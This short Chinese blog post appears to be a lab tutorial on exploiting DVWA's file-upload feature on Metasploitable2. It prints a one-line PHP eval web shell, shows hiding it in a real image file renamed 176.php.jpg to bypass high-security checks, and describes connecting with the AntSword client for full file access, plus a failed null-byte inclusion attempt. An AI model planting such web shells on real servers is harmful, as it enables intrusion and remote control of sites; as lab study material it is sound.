文件上传漏洞的一些攻击方法

metasploitable2

Posted by MetaNetworks on June 6, 2020
本页面总访问量

本文使用metasploitable2进行演示

本文内容仅供交流学习使用,禁止用于不法用途!!!

一句话木马

1
<?php @eval($_POST['176']) ?>

将代码传入php-cgi即可达到我们执行shell命令的目的

上传代码

对于安全级别为HighDVMA来说,其包含的上传图片功能,我们单纯通过修改文件后缀名、PureSuite改变文件类型是无法做到的,还要保证符合文件特征

高安全度

文件不合规范会提示以下信息:

无法上传提示

我们通常得进行数据包含!

在一张正常的图片中,追加一段php代码,此处我们使用GHex

GHex

然后改名为176.php.jpg即可上传上去。

最后打开中国蚁剑,输入地址:http://xxx.xxx.xxx.xxx/hackable/uploads/176.php.jpg,密码:176即可拿到webshell,可以访问所有目录文件夹。渗透成功。

PS: 在我的Metasploitable2中,其他教程中提到的截%00../fi/?page=file:///var/www/dvwa/hackable/uploads/xxx好像都没用emm

截取0尝试(失败):

访问网址:

File not found.